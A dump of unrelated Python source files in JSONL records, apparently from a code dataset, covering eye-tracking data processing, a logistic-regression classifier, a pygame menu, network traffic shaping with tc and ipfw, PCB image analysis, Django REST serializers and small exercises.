gazefile = None\n blinkfile = None\n pupilfile = None\n behavfile = None\n\n for txtfile in txtfiles:\n if 'gaze' in txtfile:\n gazefile = txtfile\n if 'blink' in txtfile:\n blinkfile = txtfile\n if 'pupil' in txtfile:\n pupilfile = txtfile\n if 'behav' in txtfile:\n behavfile = txtfile\n\n print(\"data for block: %s\" %block)\n print(gazefile)\n print(blinkfile)\n print(pupilfile)\n print(behavfile)\n\n return [gazefile, blinkfile, pupilfile, behavfile]\n\n # Read each subject's raw data files. Headers are specified in settings\ndef read_tsv(filename, headers):\n rows = []\n\n with open(filename, 'r') as f:\n for line in f:\n data = line.rstrip().split('\\t')\n\n row_data = {}\n column_cnt = 0\n for header in headers:\n row_data[header] = data[column_cnt]\n column_cnt += 1\n\n rows.append(row_data)\n\n return rows\n\n# collects data from the raw data files ###check\ndef get_new_data_row():\n row = {}\n for val in settings.gazecols:\n row[val] = settings.default_value\n #for val in settings.behavcols:\n #row[val] = settings.default_value\n\n return row\n\n# ogama needs trials starting at 1 so we modify all the trials for all processing\ndef trial_reindex(row):\n row['Trial'] = int( row['Trial']) + 1\n\n# helps combine blink/pupil data with gaze file\ndef add_ocular_data_to_dataset(combined_data_set, rows):\n for r in rows:\n key = r['Trial'] + ':' + r['Time']\n if key not in combined_data_set:\n combined_data_set[key] = get_new_data_row()\n for col, value in r.items():\n combined_data_set[key][col] = value\n\n## functions to assign a condition to each trial. 
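The LIA computation above is the upper tail of a binomial: each of the 2**k grandchildren is AaBb with probability 1/4 independently of the parents' genotypes, so the count of AaBb offspring is Binomial(2**k, 0.25) and the answer is P(X >= N). The same sum using `math.comb` (Python 3.8+) instead of factorial ratios:

```python
import math

def independent_alleles(k, n):
    pop = 2 ** k
    return sum(math.comb(pop, i) * 0.25 ** i * 0.75 ** (pop - i)
               for i in range(n, pop + 1))

# Rosalind's sample case: k=2, N=1 -> 0.684 (to three decimals).
assert abs(independent_alleles(2, 1) - 0.684) < 1e-3
```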
conditions specified in settings.\n# sets keys for trial number\ndef get_dic(filename):\n d = {}\n with open(filename, 'r') as d_list:\n for line in d_list:\n (key, val) = line.rstrip().split('\\t')\n d[int(key)] = val\n return d\n# maps the condition to the trial key\ndef map_conditions(new_column, row_data, trial_dic):\n if row_data['Trial'] not in trial_dic:\n raise Exception('trial not found %s' % row_data['Trial'])\n\n row_data[new_column] = trial_dic[row_data['Trial']]\n\n# ogama can only read sbj ids that start with a letter\ndef ogama_subject(subjid, block, row):\n row['Subject_ogama'] = 'tp' + str(subjid) + block\n\n# add subject and block information to the files\ndef subject_block(subjid, block, row):\n row['PID'] = subjid\n row['Block'] = block\n\n# calculate accuracy based on behavioral info\ndef acc(row):\n #raise exception if behavioral information is missing?\n row['ACC'] = 1 if row['CorrectAnswer'] == row['SubjectResponse'] else 0\n\n# write out function to\ndef output_rows(filepath, rows):\n if len(rows) == 0:\n raise Exception('Nothing to write!')\n\n with open(filepath, 'w') as f:\n headers = list(rows[0].keys())\n f.write('\\t'.join(headers))\n f.write('\\n')\n\n for row in rows:\n values = [str(row[header]) for header in headers]\n line = '\\t'.join(values)\n f.write(line)\n f.write('\\n')\n\n# map answer picture to position\ndef map_picture_aoi(row, rule_dict, listAOIs):\n pic_aoi_dict = {}\n picture_ids = listAOIs.split(',')\n aoi = 1\n for pic in picture_ids:\n pic_aoi_dict['A'+str(aoi)] = (pic, rule_dict[int(pic)])\n aoi += 1\n return pic_aoi_dict\n\n\ndef map_answer_rules(new_column, row, dic_rules):\n response = int(row['SubjectResponse'])\n if response not in dic_rules:\n raise Exception('rule associated with answer picture %s not found' % response)\n else:\n row[new_column] = dic_rules[response]\n","sub_path":"scripts/progressive_matrices/df_utils_m.py","file_name":"df_utils_m.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"89969366","text":"\nimport pandas as pd\nimport requests\nimport math\nfrom scipy.spatial import distance\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import metrics\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cross_validation import train_test_split\nimport time\nimport numpy\n\ndef getErrors(test, prediction, npis, dataframe):\n prediction = prediction.tolist()\n typeOneErrors = [] # incorrectly predicted that they are Psychiatrist\n typeTwoErrors = [] # incorrectly predicted that they are not Psychiatrist\n for i in range(len(test)):\n if (test[i] != prediction[i]):\n if (test[i] == 0 and prediction == 1):\n typeOneErrors.append(npis[i])\n else:\n typeTwoErrors.append(npis[i])\n typeOneDF = dataframe[dataframe['npi'].isin(typeOneErrors)]\n typeTwoDF = dataframe[dataframe['npi'].isin(typeTwoErrors)]\n return [typeOneDF, typeTwoDF]\n\ndef nullAccuracy(Y_Test):\n oneCount = 0\n zeroCount = 0\n for x in Y_test:\n if x == 1:\n oneCount += 1\n else:\n zeroCount += 1\n oneAverage = (float((oneCount)) / (oneCount + zeroCount)) * 100\n zeroAverage = 1 - oneAverage\n nullAccuracy = max(oneAverage, zeroAverage)\n return nullAccuracy\n\ndef getData():\n start_time = time.time()\n\n numberOfEntries = \"$limit=50000\"\n selectClause = \"$select=npi,total_claim_count,drug_name,specialty_desc\"\n query = \"https://data.cms.gov/resource/hffa-2yrd.json?\" + 
selectClause + \"&\" + numberOfEntries \n dataFrame = pd.read_json(query)\n \n crosstab = pd.crosstab([dataFrame[\"npi\"], dataFrame[\"specialty_desc\"]], dataFrame[\"drug_name\"])\n drugList = crosstab.keys() # list of all drugs. 1 if doctor has prescribed it 0 if not\n npis = [] # array of npi's\n data = [] # each entry is an array of drugs prescribed\n labels = [] # each entry is either 1 for Psychiatrist, 0 if not.\n \n psychCount = 0\n nonPsychCount = 0\n \n # need more efficient way to handle this\n for index, row in crosstab.iterrows():\n if (psychCount > 1313): # made it 10x faster, this loop is what takes so long\n break\n if (index[1] == \"Psychiatry\"):\n labels.append(1)\n psychCount += 1\n else:\n if (nonPsychCount > 1313):\n continue\n labels.append(0)\n nonPsychCount += 1\n newArray = [] # holds drugs they prescribed\n for drug in drugList:\n newArray.append(row[drug])\n data.append(newArray)\n npis.append(index[0])\n\n print(\"Number of Psychiatrists: \" + str(psychCount) + \", Other Specialities: \" + str(nonPsychCount))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n X_train, X_test, Y_train, Y_test = train_test_split(data, labels, random_state=0)\n \n logreg = LogisticRegression()\n logreg.fit(X_train, Y_train)\n \n predictions = logreg.predict(X_test)\n \n errors = getErrors(Y_test, predictions, npis, dataFrame)\n typeOneErrors = errors[0]\n typeTwoErrors = errors[1]\n # print typeTwoErrors\n \n AUC = metrics.roc_auc_score(Y_test, predictions)\n print(AUC)\n \n fpr, tpr, thresholds = metrics.roc_curve(Y_test, predictions)\n plt.plot(fpr, tpr)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.0])\n plt.title(\"Psychiatrist Prediction Classifier\")\n plt.xlabel('False Positive Rate')\n plt.ylabel(\"True Positive Rate\")\n plt.grid(True)\n plt.show()\n\nif __name__ == \"__main__\":\n getData()\n","sub_path":"logisticRegression.py","file_name":"logisticRegression.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"582511878","text":"\"\"\"\nVertrekt van de tijdreeksen van de features van het teamleader ecosysteem.\nInput:\n - Feature \n - Specifiek bedrijf in het teamleader ecosysteem\nOutput:\n\n - Boxplot voor het bedrijf en de feature\n\"\"\"\n\nimport sys\n\nif sys.argv[1] == '-h':\n print(\"<pivot_table.py -feature -firm(s) >\")\n quit()\n \nimport pandas as pd\nimport numpy as np\nimport pickle \nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n\nfeature = sys.argv[1]\nfirm = sys.argv[2]\nfirms = sys.argv[2:]\nprint(firms)\n\npivot_tables = pickle.load(open('pivot_tables.p', 'rb'))\n\n\ntry:\n if len(sys.argv) > 3:\n print(pivot_tables[feature][firms].describe())\n pivot_tables[feature][firms].plot(kind='box')\n else:\n print(pivot_tables[feature][[firm]].describe())\n pivot_tables[feature][[firm]].plot(kind='box')\n plt.title('Boxplot of feature '+ feature)\n plt.ylabel(feature)\n plt.show()\nexcept:\n print('Feature or Firm not recognized')\n quit()\n\nquit()\n\n","sub_path":"pivot_table_boxplot.py","file_name":"pivot_table_boxplot.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"323731055","text":"import pygame\nimport highscores\nimport sys\nimport Button\nimport findButton\nimport Game\n\ndef menu():\n '''\n This function sets up the display for the main menu and has some logic determining whether or not the menu should remain on screen.\n param 
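In `getErrors()` above, the inner test `if (test[i] == 0 and prediction == 1)` compares the whole `prediction` list to 1, which is always False, so every misclassified NPI lands in `typeTwoErrors`. A corrected split that indexes the prediction for the same sample; names are illustrative:

```python
def split_errors(y_true, y_pred, ids):
    """Partition misclassified sample ids into false positives and false negatives."""
    false_positives, false_negatives = [], []
    for truth, pred, sample_id in zip(y_true, y_pred, ids):
        if truth == pred:
            continue
        if truth == 0 and pred == 1:
            false_positives.append(sample_id)   # predicted psychiatrist, isn't one
        else:
            false_negatives.append(sample_id)   # psychiatrist the model missed
    return false_positives, false_negatives
```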
list: none\n returns: None\n '''\n white=(255,255,255)\n red=(255,0,0)\n green=(0,255,0)\n screen = \"menu\"\n brown = (139, 69, 19)\n while screen == \"menu\":\n title = pygame.image.load(\"title.png\")\n present = pygame.image.load(\"present.png\")\n treeStar = pygame.image.load(\"treeStar.png\")\n gameDisplay = pygame.display.set_mode((970,650))\n gameDisplay.fill(red)\n pygame.display.set_caption(\"Winter Card Matcher\")\n gameDisplay.blit(title,(100,0))\n gameDisplay.blit(present,(600, 300))\n gameDisplay.blit(treeStar, (250, 150))\n running = True\n\n play = Button.Button(gameDisplay, white, green, white, (200, 230), (175, 50), \" START\")\n\n stump = Button.Button(gameDisplay, white, brown, brown, (260, 480),(50, 50), \"\")\n\n highscore = Button.Button(gameDisplay, white, green, white, (160, 330), (250, 50), \" HIGHSCORES\")\n\n quitGame = Button.Button(gameDisplay, white, green, white, (120, 430), (325, 50), \" QUIT\")\n\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if findButton.buttonDetect(quitGame):\n running = False\n pygame.quit()\n quit()\n\n elif findButton.buttonDetect(play):\n running = False\n Game.game(24)\n\n elif findButton.buttonDetect(highscore):\n running = False\n highscores.highscores()\n\n else:\n running = True\nmenu()\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"113211258","text":"# 15. 末尾のN行を出力\n# 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち末尾のN行だけを表示せよ.確認にはtailコマンドを用いよ.\n\n\ndef tail(pathfile, n):\n with open(pathfile, encoding='utf-8') as f:\n lines = f.readlines()\n result = []\n for i in range(1, n):\n i = -i\n result.append(lines[i].strip())\n result.reverse()\n\n return print(result)\n\n\nif __name__ == '__main__':\n path = '../hightemp_test.txt'\n tail(path, 6)\n","sub_path":"houjing.wei/chapter02/knock15.py","file_name":"knock15.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"106088871","text":"PROG_DAEMONIZE = False\nSRV_PORT = 10002\n\nDEBUG_LOG = None # None or True\nLOG_FILE_LOCATION = None\nLOG_FILE_NAME = None\nLOG_FILE_LOCATIONS_CLIENTS = None\n#spot_sensor.log\"\n\nPDI_FILE_SENSOR = '/tmp/spot_sensor.pid'\n\n\nSPOT_SENSOR = {}\nAUTO_DISCOVERY = None\nSLEEP_TIMER = None\nSLEEP_TIMER_IN = None\nSLEEP_TIMER_OUT = 1\nMAX_TIME_NOT_SEEN = None\nSENSOR_AVAILABLE = None\n\nIP_CCU = None\nCCU_CONNECTION_OK = None\n\nPDI_FILE = '/tmp/spot_check.pid'\n\nPROG_DIR = \"/opt/spot\"\nCFG = None\n\nPIFACECAD_SUPPORT = None\n\nRGBLED_SUPPORT = None\nRGBLED_RED = None\nRGBLED_GREEN = None\nRGBLED_BLUE = None\n\nBT_SUPPORT = None\n\nSYS_ENCODING = None\nABS_PATH = None\nDB_FILE = None\n","sub_path":"core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"372324506","text":"# Copyright 2017 Google Inc. 
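`tail()` in the knock15 record above loops over `range(1, n)` and so collects only n-1 lines — the call `tail(path, 6)` prints five. If the intent is the last N lines (as the exercise statement says), a negative slice returns them directly, already in file order:

```python
def tail(pathfile, n):
    """Return the last n lines of the file, stripped of trailing newlines."""
    with open(pathfile, encoding='utf-8') as f:
        return [line.rstrip('\n') for line in f][-n:]
```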
All rights reserved.\n# Use of this source code is governed by the Apache 2.0 license that can be\n# found in the LICENSE file.\n\"\"\"Cross-platform support for traffic-shaping\"\"\"\nimport logging\nimport os\nimport platform\nimport re\nimport subprocess\n\nclass TrafficShaper(object):\n \"\"\"Main traffic-shaper interface\"\"\"\n def __init__(self, shaper_name):\n self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"support\")\n self.shaper = None\n if shaper_name is not None:\n if shaper_name == 'none':\n self.shaper = NoShaper()\n else:\n plat = platform.system()\n if plat == \"Windows\":\n winver = float(\".\".join(platform.version().split('.')[:2]))\n if winver >= 8.1:\n self.shaper = WinShaper()\n else:\n self.shaper = Dummynet()\n elif plat == \"Linux\":\n self.shaper = NetEm()\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n ret = False\n if self.shaper is not None:\n ret = self.shaper.install()\n return ret\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n ret = False\n if self.shaper is not None:\n ret = self.shaper.remove()\n return ret\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n ret = False\n if self.shaper is not None:\n ret = self.shaper.reset()\n return ret\n\n def configure(self, job):\n \"\"\"Enable traffic-shaping\"\"\"\n ret = False\n in_bps = 0\n if 'bwIn' in job:\n in_bps = int(job['bwIn']) * 1000\n out_bps = 0\n if 'bwOut' in job:\n out_bps = int(job['bwOut']) * 1000\n rtt = 0\n if 'latency' in job:\n rtt = int(job['latency'])\n plr = .0\n if 'plr' in job:\n plr = float(job['plr'])\n if self.shaper is not None:\n ret = self.shaper.configure(in_bps, out_bps, rtt, plr)\n return ret\n\n\n#\n# NoShaper\n#\nclass NoShaper(object):\n \"\"\"Allow resets but fail any explicit shaping\"\"\"\n def __init__(self):\n pass\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n return True\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n return True\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n return True\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n if in_bps > 0 or out_bps > 0 or rtt > 0 or plr > 0:\n return False\n return True\n\n#\n# winshaper\n#\nclass WinShaper(object):\n \"\"\"Windows 8.1+ traffic-shaper using winshaper\"\"\"\n def __init__(self):\n self.exe = os.path.join(os.path.abspath(os.path.dirname(__file__)),\n \"support\", \"winshaper\", \"shaper.exe\")\n\n def shaper(self, args):\n \"\"\"Run a shaper command with elevated permissions\"\"\"\n from .os_util import run_elevated\n return run_elevated(self.exe, ' '.join(args)) == 0\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n return self.shaper(['install'])\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n return self.shaper(['remove'])\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n return self.shaper(['reset'])\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n return self.shaper(['set',\n 'inbps={0:d}'.format(in_bps),\n 'outbps={0:d}'.format(out_bps),\n 'rtt={0:d}'.format(rtt),\n 'plr={0:.2f}'.format(plr)])\n\n#\n# Dummynet\n#\nclass Dummynet(object):\n \"\"\"Dummynet support (windows only currently)\"\"\"\n def __init__(self):\n self.exe = os.path.join(os.path.abspath(os.path.dirname(__file__)),\n \"support\", \"dummynet\")\n if platform.machine().endswith('64'):\n self.exe = os.path.join(self.exe, \"x64\", \"ipfw.exe\")\n 
else:\n self.exe = os.path.join(self.exe, \"x86\", \"ipfw.exe\")\n\n def ipfw(self, args):\n \"\"\"Run a single ipfw command\"\"\"\n from .os_util import run_elevated\n return run_elevated(self.exe, ' '.join(args)) == 0\n\n def install(self):\n \"\"\"Set up the pipes\"\"\"\n return self.ipfw(['-q', 'flush']) and\\\n self.ipfw(['-q', 'pipe', 'flush']) and\\\n self.ipfw(['pipe', '1', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['pipe', '2', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['queue', '1', 'config', 'pipe', '1', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff']) and\\\n self.ipfw(['queue', '2', 'config', 'pipe', '2', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff']) and\\\n self.ipfw(['add', 'queue', '1', 'ip', 'from', 'any', 'to', 'any', 'in']) and\\\n self.ipfw(['add', 'queue', '2', 'ip', 'from', 'any', 'to', 'any', 'out']) and\\\n self.ipfw(['add', '60000', 'allow', 'ip', 'from', 'any', 'to', 'any'])\n\n def remove(self):\n \"\"\"clear the config\"\"\"\n return self.ipfw(['-q', 'flush']) and\\\n self.ipfw(['-q', 'pipe', 'flush'])\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n return self.ipfw(['pipe', '1', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['pipe', '2', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['queue', '1', 'config', 'pipe', '1', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff']) and\\\n self.ipfw(['queue', '2', 'config', 'pipe', '2', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff'])\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n # inbound connection\n in_kbps = int(in_bps / 1000)\n in_latency = rtt / 2\n if rtt % 2:\n in_latency += 1\n in_command = ['pipe', '1', 'config']\n if in_kbps > 0:\n in_command.extend(['bw', '{0:d}Kbit/s'.format(in_kbps)])\n if in_latency >= 0:\n in_command.extend(['delay', '{0:d}ms'.format(in_latency)])\n\n # outbound connection\n out_kbps = int(out_bps / 1000)\n out_latency = rtt / 2\n out_command = ['pipe', '2', 'config']\n if out_kbps > 0:\n out_command.extend(['bw', '{0:d}Kbit/s'.format(out_kbps)])\n if out_latency >= 0:\n out_command.extend(['delay', '{0:d}ms'.format(out_latency)])\n\n # Packet loss get applied to the queues\n plr = plr / 100.0\n in_queue_command = ['queue', '1', 'config', 'pipe', '1', 'queue', '100']\n out_queue_command = ['queue', '2', 'config', 'pipe', '2', 'queue', '100']\n if plr > 0.0 and plr <= 1.0:\n in_queue_command.extend(['plr', '{0:.4f}'.format(plr)])\n out_queue_command.extend(['plr', '{0:.4f}'.format(plr)])\n in_queue_command.extend(['mask', 'dst-port', '0xffff'])\n out_queue_command.extend(['mask', 'dst-port', '0xffff'])\n\n return self.ipfw(in_command) and\\\n self.ipfw(out_command) and\\\n self.ipfw(in_queue_command) and\\\n self.ipfw(out_queue_command)\n\n#\n# netem\n#\nclass NetEm(object):\n \"\"\"Linux traffic-shaper using netem/tc\"\"\"\n def __init__(self):\n self.interface = None\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n ret = False\n\n # Figure out the default interface\n try:\n out = subprocess.check_output(['route'])\n routes = out.splitlines()\n match = re.compile(r'^([^\\s]+)\\s+[^\\s]+\\s+[^\\s]+\\s+[^\\s]+\\s+'\\\n r'[^\\s]+\\s+[^\\s]+\\s+[^\\s]+\\s+([^\\s]+)')\n for route in routes:\n fields = re.search(match, route)\n if fields:\n destination = fields.group(1)\n if destination == 'default':\n self.interface = fields.group(2)\n logging.debug(\"Default interface: %s\", self.interface)\n break\n\n 
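The default-interface discovery above shells out to `route` and parses its table with a regex. A hedged alternative asks the kernel for the default route directly via `ip route show default` (iproute2); the usual "default via <gw> dev <iface> ..." output format is assumed:

```python
import subprocess

def default_interface():
    """Name of the interface carrying the default route, or None."""
    out = subprocess.check_output(['ip', 'route', 'show', 'default'])
    fields = out.decode().split()
    if 'dev' in fields:
        return fields[fields.index('dev') + 1]
    return None
```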
if self.interface:\n # Set up the ifb interface so inbound traffic can be shaped\n subprocess.call(['sudo', 'modprobe', 'ifb'])\n subprocess.call(['sudo', 'ip', 'link', 'set', 'dev', 'ifb0', 'up'])\n subprocess.call(['sudo', 'tc', 'qdisc', 'add', 'dev', self.interface, 'ingress'])\n subprocess.call(['sudo', 'tc', 'filter', 'add', 'dev', self.interface, 'parent',\n 'ffff:', 'protocol', 'ip', 'u32', 'match', 'u32', '0', '0',\n 'flowid', '1:1', 'action', 'mirred', 'egress', 'redirect',\n 'dev', 'ifb0'])\n self.reset()\n ret = True\n else:\n logging.critical(\"Unable to identify default interface using 'route'\")\n except Exception as err:\n logging.debug(\"Error configuring netem: %s\", err.__str__())\n return ret\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n return True\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n ret = False\n if self.interface is not None:\n ret = subprocess.call(['sudo', 'tc', 'qdisc', 'del', 'dev', 'ifb0', 'root']) == 0 and\\\n subprocess.call(['sudo', 'tc', 'qdisc', 'del', 'dev', self.interface,\n 'root']) == 0\n return ret\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n ret = False\n if self.interface is not None:\n in_latency = rtt / 2\n if rtt % 2:\n in_latency += 1\n if self.configure_interface('ifb0', in_bps, in_latency, plr):\n ret = self.configure_interface(self.interface, out_bps, rtt / 2, plr)\n return ret\n\n def configure_interface(self, interface, bps, latency, plr):\n \"\"\"Configure traffic-shaping for a single interface\"\"\"\n ret = False\n args = ['sudo', 'tc', 'qdisc', 'add', 'dev', interface, 'root', 'handle',\n '1:0', 'netem', 'delay', '{0:d}ms'.format(latency)]\n if plr > 0:\n args.extend(['loss', '{0:.2f}%'.format(plr)])\n ret = subprocess.call(args) == 0\n if ret and bps > 0:\n kbps = int(bps / 1000)\n args = ['sudo', 'tc', 'qdisc', 'add', 'dev', interface, 'parent', '1:1',\n 'handle', '10:', 'tbf', 'rate', '{0:d}kbit'.format(kbps),\n 'buffer', '150000', 'limit', '150000']\n ret = subprocess.call(args) == 0\n return ret\n","sub_path":"internal/traffic_shaping.py","file_name":"traffic_shaping.py","file_ext":"py","file_size_in_byte":11040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"452439294","text":"# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: #\n# Date: 03.11.2016 #\n# Author: Ole-Johan Skrede #\n# #\n# Solution proposal as part of the exercise program in #\n# INF4300 - Digital image analysis at the University of Oslo #\n# #\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: #\n\"\"\"\nSolution proposal for exercise 10, task 5.\n\"\"\"\n\n# pylint: disable=expression-not-assigned\n# pylint: disable=bad-indentation\n\nimport os\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage # pylint: disable=import-error\n#import seaborn as sns # pylint: disable=import-error,unused-import\n\ndef plot_image(image, fig_num, name=None, colormap='gray', write_file=None):\n \"\"\"Plot image\"\"\"\n fig = plt.figure(fig_num)\n plt.imshow(image, cmap=colormap, interpolation='none')\n if name is not None:\n plt.title(name)\n plt.xticks([]), plt.yticks([])\n plt.tight_layout()\n if write_file:\n fig.savefig(write_file, bbox_inches='tight', pad_inches=0)\n fig_num += 1\n return fig_num\n\ndef main():\n \"\"\"main\"\"\"\n\n print('='*80)\n print('Solution to weekly exercises in INF4300')\n print('Exercise 10')\n print('Task 5')\n 
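# The steps below measure drill-hole diameters on the PCB image: binarise at 128, fill the holes, subtract to isolate them, and label them with cv2.connectedComponentsWithStats (stats column 4 is the pixel area; row 0 is the background and is skipped).\n # Each hole is then annotated with its equivalent-circle diameter d = 2*sqrt(area/pi).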
print('-'*80)\n\n fig_num = 0\n image_dir = '../../images'\n write_dir = 'results/images'\n\n pcb_image = cv2.imread(os.path.join(image_dir, 'pcb.jpg'), cv2.IMREAD_GRAYSCALE)\n pcb_image = (pcb_image >= 128).astype(np.uint8)\n fig_num = plot_image(pcb_image, fig_num,\n write_file=os.path.join(write_dir, 'pcb_orig.png'))\n\n pcb_filled = ndimage.binary_fill_holes(pcb_image).astype(np.uint8)\n fig_num = plot_image(pcb_filled, fig_num,\n write_file=os.path.join(write_dir, 'pcb_filled.png'))\n\n pcb_holes = pcb_filled - pcb_image\n fig_num = plot_image(pcb_holes, fig_num,\n write_file=os.path.join(write_dir, 'pcb_holes.png'))\n\n _, pcb_labeled, stats, centroids = cv2.connectedComponentsWithStats(pcb_holes)\n area = stats[1:, 4]\n centroids = centroids[1:, :]\n\n fig = plt.figure(fig_num)\n height, width = pcb_holes.shape\n plt.imshow(pcb_labeled, cmap='magma', interpolation='none')\n plt.xticks([]), plt.yticks([])\n plt.tight_layout()\n\n for obj_ind, obj_area in enumerate(area):\n diameter = 2*np.sqrt(obj_area / np.pi) # Assuming circular objects\n diam_str = '{:.2f}'.format(diameter)\n plt.text(centroids[obj_ind, 0], centroids[obj_ind, 1], diam_str,\n color='green', fontsize=14, weight='bold')\n\n plt.plot(centroids[obj_ind, 0], centroids[obj_ind, 1], 'ro')\n axes = plt.gca()\n axes.set_xlim([0, width-1])\n axes.set_ylim([height-1, 0])\n fig.savefig(os.path.join(write_dir, 'pcb_labeled.png'), bbox_inches='tight', pad_inches=0)\n\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions/week_10/inf4300_h16_ex10_t05.py","file_name":"inf4300_h16_ex10_t05.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"513340361","text":"from rest_framework import permissions\n\nclass IsSlotModificationAllowed(permissions.BasePermission):\n    \"\"\"\n    Object-level permission guarding slot modifications:\n    an empty slot can not be locked.\n    \"\"\"\n\n    def has_object_permission(self, request, view, obj):\n # Read permissions are allowed to any request,\n # so we'll always allow GET, HEAD or OPTIONS requests.\n if request.method in permissions.SAFE_METHODS:\n return True\n # `message` is DRF's custom error-detail attribute; the permission\n # denies the request by returning False\n if 'is_locked' in request.data:\n if obj.is_empty:\n self.message = 'You can not lock an empty slot'\n return False\n\n return True","sub_path":"helmet_zones/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"511341261","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass createTree:\n def create(self, nodes):\n root = TreeNode(nodes.pop(0))\n queue = [root]\n while queue:\n p = queue.pop(0)\n if nodes:\n node = nodes.pop(0)\n if node:\n queue.append(self.insert_left(p, node))\n if nodes:\n node = nodes.pop(0)\n if node:\n queue.append(self.insert_right(p, node))\n\n return root\n\n def insert_left(self, root, left):\n new = TreeNode(left)\n root.left = new\n return new\n\n def insert_right(self, root, right):\n new = TreeNode(right)\n root.right = new\n return new\n\n\nclass Solution:\n def rob(self, root: TreeNode) -> int:\n if not root:\n return 0\n money = root.val\n if root.left:\n money += self.rob(root.left.left) + self.rob(root.left.right)\n if root.right:\n money += self.rob(root.right.left) + self.rob(root.right.right)\n\n return 
max(money, self.rob(root.left) + self.rob(root.right))\n\n\nclass Solution1:\n def __init__(self):\n self.dic = {}\n\n def rob(self, root: TreeNode) -> int:\n if not root:\n return 0\n if root in self.dic:\n return self.dic[root]\n money = root.val\n if root.left:\n money += self.rob(root.left.left) + self.rob(root.left.right)\n if root.right:\n money += self.rob(root.right.left) + self.rob(root.right.right)\n res = max(money, self.rob(root.left) + self.rob(root.right))\n self.dic[root] = res\n\n return res\n\n\nclass Solution2:\n def rob(self, root: TreeNode) -> int:\n res = self.my_rob(root)\n return max(res[0], res[1])\n\n def my_rob(self, root):\n res = [0, 0]\n if not root:\n return res\n left = self.my_rob(root.left)\n right = self.my_rob(root.right)\n res[0] = max(left[0], left[1]) + max(right[0], right[1])\n res[1] = left[0] + right[0] + root.val\n\n return res\n\n\nif __name__ == '__main__':\n nodes = [3, 2, 3, None, 3, None, 1]\n root = createTree().create(nodes)\n print(Solution().rob(root))\n print(Solution1().rob(root))\n print(Solution2().rob(root))\n","sub_path":"301_350/337_house_robber_iii.py","file_name":"337_house_robber_iii.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"145638959","text":"from django.utils import timezone\n\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueValidator\n\nfrom reviews.models import Category, Comment, Genre, Review, Title, User\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(\n slug_field='username',\n read_only=True,\n default=serializers.CurrentUserDefault()\n )\n title = serializers.SlugRelatedField(\n 